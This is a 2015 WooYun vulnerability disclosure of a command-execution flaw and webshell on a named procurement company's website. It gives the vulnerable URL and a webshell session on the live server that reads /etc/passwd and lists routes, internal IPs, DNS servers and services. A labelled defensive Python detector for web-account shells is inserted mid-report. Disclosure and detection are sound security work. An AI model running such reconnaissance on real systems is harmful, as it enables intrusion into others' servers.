
Vulnerability summary

Defect ID: wooyun-2015-0152285

Title: 易采国际 official website getshell

Vendor: 易采国际

Author: 朱元璋

Submitted: 2015-11-06 15:48

Fix deadline: 2015-12-21 15:50

Published: 2015-12-21 15:50

Vulnerability type: Untimely system/service patching

Severity: High

Self-assessed Rank: 15

Status: Vendor could not be contacted, or vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help, contact [email protected]



Vulnerability details

Disclosure status:

2015-11-06: Actively contacting the vendor and waiting for the vendor to claim the report; details are not publicly disclosed
2015-12-21: The vendor has actively ignored the vulnerability; details are disclosed to the public

Brief description:

The China International Contractors Association and the Linyi municipal government established a strategic partnership in 2014 and formed a professional team to build the "易采国际" platform, which provides one-stop procurement of materials and equipment for international engineering enterprises.
Detailed introduction: http://linyi.iqilu.com/lyshizheng/2014/0627/2043559.shtml

Details:

Open the official site http://www.ecsuntrade.com/index/index_execute.html; the URL http://www.ecsuntrade.com/index/footer/footer!about.action has a command execution vulnerability.

0.png


A webshell was uploaded directly to the server.

1.jpg


2.png

Proof of vulnerability:

[/usr/local/tomcat/webapps/ROOT/]$ netstat -rn
Kernel IP routing table
Destination Gateway Genmask Flags MSS Window irtt Iface
192.168.10.6 0.0.0.0 255.255.255.255 UH 0 0 0 tun0
192.168.10.0 192.168.10.6 255.255.255.0 UG 0 0 0 tun0
10.172.192.0 0.0.0.0 255.255.248.0 U 0 0 0 eth0
169.254.0.0 0.0.0.0 255.255.0.0 U 0 0 0 eth0
192.168.0.0 10.172.199.247 255.255.0.0 UG 0 0 0 eth0
172.16.0.0 10.172.199.247 255.240.0.0 UG 0 0 0 eth0
100.64.0.0 10.172.199.247 255.192.0.0 UG 0 0 0 eth0
10.0.0.0 10.172.199.247 255.0.0.0 UG 0 0 0 eth0
0.0.0.0 10.172.199.247 0.0.0.0 UG 0 0 0 eth0
[/usr/local/tomcat/webapps/ROOT/]$ netsat -tnlp
/bin/sh: netsat: command not found
[/usr/local/tomcat/webapps/ROOT/]$ cat /proc/net/netlink
Run command [cat /proc/net/netlink] failed!
[/usr/local/tomcat/webapps/ROOT/]$ ps aux | grep udev
root 372 0.0 0.0 10752 788 ? S<s Apr03 0:00 /sbin/udevd -d
root 1040 0.0 0.0 10752 764 ? S< Apr03 0:00 /sbin/udevd -d
root 1041 0.0 0.0 10752 748 ? S< Apr03 0:00 /sbin/udevd -d
tomcat 12622 0.0 0.0 106096 1176 ? S 11:58 0:00 /bin/sh -c cd "/usr/local/tomcat/webapps/ROOT/";ps aux | grep udev;echo [S];pwd;echo [E]
tomcat 12624 0.0 0.0 103256 844 ? S 11:58 0:00 grep udev
[/usr/local/tomcat/webapps/ROOT/]$ lsb_release -a
LSB Version: :base-4.0-amd64:base-4.0-noarch:core-4.0-amd64:core-4.0-noarch
Distributor ID: CentOS
Description: CentOS release 6.5 (Final)
Release: 6.5
Codename: Final
[/usr/local/tomcat/webapps/ROOT/]$ w #
Run command [w #] failed!
[/usr/local/tomcat/webapps/ROOT/]$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
tomcat:x:500:500::/home/tomcat:/bin/bash
zabbix:x:498:499:Zabbix Monitoring System:/var/lib/zabbix:/sbin/nologin
rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
[/usr/local/tomcat/webapps/ROOT/]$ ifconfig
eth0 Link encap:Ethernet HWaddr 00:16:3E:00:47:6B
inet addr:10.172.192.200 Bcast:10.172.199.255 Mask:255.255.248.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:1947691878 errors:0 dropped:0 overruns:0 frame:0
TX packets:441015158 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:117970625321 (109.8 GiB) TX bytes:91374939586 (85.0 GiB)
Interrupt:164
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:364 errors:0 dropped:0 overruns:0 frame:0
TX packets:364 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:35948 (35.1 KiB) TX bytes:35948 (35.1 KiB)
tun0 Link encap:UNSPEC HWaddr 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00
inet addr:192.168.10.5 P-t-P:192.168.10.6 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:2794161 errors:0 dropped:0 overruns:0 frame:0
TX packets:2461976 errors:0 dropped:3275 overruns:0 carrier:0
collisions:0 txqueuelen:100
RX bytes:2718697775 (2.5 GiB) TX bytes:1602616473 (1.4 GiB)
[/usr/local/tomcat/webapps/ROOT/]$ cat /etc/resolv.conf
options timeout:1 attempts:1 rotate
nameserver 10.202.72.118
nameserver 10.202.72.116
[/usr/local/tomcat/webapps/ROOT/]$ bash prompt:
bash: prompt:: No such file or directory
[/usr/local/tomcat/webapps/ROOT/]$ chkconfig --list
abrt-ccpp 0:off 1:off 2:off 3:off 4:off 5:off 6:off
abrtd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
acpid 0:off 1:off 2:off 3:off 4:off 5:off 6:off
aegis 0:off 1:off 2:on 3:on 4:on 5:on 6:off
atd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
auditd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
blk-availability 0:off 1:on 2:off 3:off 4:off 5:off 6:off
cpuspeed 0:off 1:on 2:off 3:off 4:off 5:off 6:off
crond 0:off 1:off 2:on 3:on 4:on 5:on 6:off
gshelld 0:off 1:off 2:on 3:on 4:on 5:on 6:off
haldaemon 0:off 1:off 2:off 3:off 4:off 5:off 6:off
ip6tables 0:off 1:off 2:off 3:off 4:off 5:off 6:off
iptables 0:off 1:off 2:on 3:on 4:on 5:on 6:off
irqbalance 0:off 1:off 2:off 3:off 4:off 5:off 6:off
kdump 0:off 1:off 2:off 3:off 4:off 5:off 6:off
lvm2-monitor 0:off 1:on 2:off 3:off 4:off 5:off 6:off
mdmonitor 0:off 1:off 2:off 3:off 4:off 5:off 6:off
messagebus 0:off 1:off 2:off 3:off 4:off 5:off 6:off
netconsole 0:off 1:off 2:off 3:off 4:off 5:off 6:off
netfs 0:off 1:off 2:off 3:off 4:off 5:off 6:off
network 0:off 1:off 2:on 3:on 4:on 5:on 6:off
nfs 0:off 1:off 2:on 3:on 4:on 5:on 6:off
nfslock 0:off 1:off 2:off 3:on 4:on 5:on 6:off
nscd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
ntpd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
ntpdate 0:off 1:off 2:off 3:off 4:off 5:off 6:off
postfix 0:off 1:off 2:off 3:off 4:off 5:off 6:off
psacct 0:off 1:off 2:off 3:off 4:off 5:off 6:off
quota_nld 0:off 1:off 2:off 3:off 4:off 5:off 6:off
rdisc 0:off 1:off 2:off 3:off 4:off 5:off 6:off
restorecond 0:off 1:off 2:off 3:off 4:off 5:off 6:off
rngd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
rpcbind 0:off 1:off 2:on 3:on 4:on 5:on 6:off
rpcgssd 0:off 1:off 2:off 3:on 4:on 5:on 6:off
rpcsvcgssd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
rsyslog 0:off 1:off 2:on 3:on 4:on 5:on 6:off
saslauthd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
smartd 0:off 1:off 2:off 3:off 4:off 5:off 6:off
sshd 0:off 1:off 2:on 3:on 4:on 5:on 6:off
svnserve 0:off 1:off 2:off 3:off 4:off 5:off 6:off
sysstat 0:off 1:on 2:on 3:on 4:on 5:on 6:off
udev-post 0:off 1:on 2:on 3:on 4:on 5:on 6:off
zabbix-agent 0:off 1:off 2:off 3:off 4:off 5:off 6:off
[/usr/local/tomcat/webapps/ROOT/]$
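The `ps aux | grep udev` output above is the part of this proof a defender can act on: the Tomcat service account is running `/bin/sh -c cd "/usr/local/tomcat/webapps/ROOT/";...;echo [S];pwd;echo [E]`, which is a webshell relaying commands, not anything a web application should spawn. The following is an added example (not code from the report or from the affected site) showing a host-side check that parses `ps aux` lines and flags shells spawned by web service accounts, and recovers the webapp directory from the `cd` prefix so the responder knows which deployed application to inspect. The sample lines are copied from the report; the set of service account names and the `cd "..."` pattern are assumptions.

```python
import re
from typing import Dict, List, Optional

# Constructed sample: four lines from the report's `ps aux | grep udev` output.
SAMPLE_PS = """\
root 372 0.0 0.0 10752 788 ? S<s Apr03 0:00 /sbin/udevd -d
root 1040 0.0 0.0 10752 764 ? S< Apr03 0:00 /sbin/udevd -d
tomcat 12622 0.0 0.0 106096 1176 ? S 11:58 0:00 /bin/sh -c cd "/usr/local/tomcat/webapps/ROOT/";ps aux | grep udev;echo [S];pwd;echo [E]
tomcat 12624 0.0 0.0 103256 844 ? S 11:58 0:00 grep udev
"""

# Assumed list of accounts that run web/app servers; adjust to the host's deployment.
WEB_SERVICE_ACCOUNTS = {"tomcat", "www-data", "apache", "nginx"}
SHELLS = {"/bin/sh", "/bin/bash", "/bin/dash", "sh", "bash"}

# Assumed webshell idiom: the relayed command starts with `cd "<webapp dir>";`.
CD_PREFIX = re.compile(r'^cd\s+"([^"]+)"')


def parse_ps_line(line: str) -> Optional[Dict[str, object]]:
    """Split one `ps aux` row into user, pid and the full command string.

    `ps aux` prints 10 fixed-width columns before COMMAND, so splitting on
    whitespace at most 10 times leaves the command (with its spaces) intact.
    """
    parts = line.split(None, 10)
    if len(parts) < 11 or not parts[1].isdigit():
        return None
    return {"user": parts[0], "pid": int(parts[1]), "command": parts[10]}


def webapp_dir(command: str) -> Optional[str]:
    """Return the directory named in a leading `cd "..."`, if present."""
    argv = command.split(None, 2)          # shell, -c, script
    if len(argv) < 3:
        return None
    m = CD_PREFIX.match(argv[2])
    return m.group(1) if m else None


def is_suspicious(proc: Dict[str, object]) -> bool:
    """True when a web service account runs `<shell> -c ...`."""
    if proc["user"] not in WEB_SERVICE_ACCOUNTS:
        return False
    argv = str(proc["command"]).split()
    return len(argv) >= 2 and argv[0] in SHELLS and argv[1] == "-c"


def find_shells_spawned_by_web_accounts(ps_output: str) -> List[Dict[str, object]]:
    """Scan `ps aux` text and return the rows that look like webshell activity."""
    hits = []
    for line in ps_output.splitlines():
        proc = parse_ps_line(line)
        if proc and is_suspicious(proc):
            proc["webapp_dir"] = webapp_dir(str(proc["command"]))
            hits.append(proc)
    return hits


if __name__ == "__main__":
    for hit in find_shells_spawned_by_web_accounts(SAMPLE_PS):
        print(f"pid {hit['pid']} user {hit['user']} webapp {hit['webapp_dir']}: {hit['command']}")
```

Run as a periodic check (or feed it live `ps aux` output) on hosts that serve Java web applications; a hit should prompt a review of the webapp directory it names for recently written `.jsp` files and a check that the application framework is at a patched version, which is the root cause this report is filed under.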

Fix recommendation:

Strengthen security awareness

Copyright notice: when reposting, please credit the source 朱元璋@乌云


Vulnerability response

Vendor response:

Unable to contact the vendor, or the vendor actively declined


Comments:

  1. 2015-11-06 18:17 | 撸管 ( Passer-by | Rank:6 Vulnerabilities:6 | 温柔风情吾二郎)

    Looks like st2.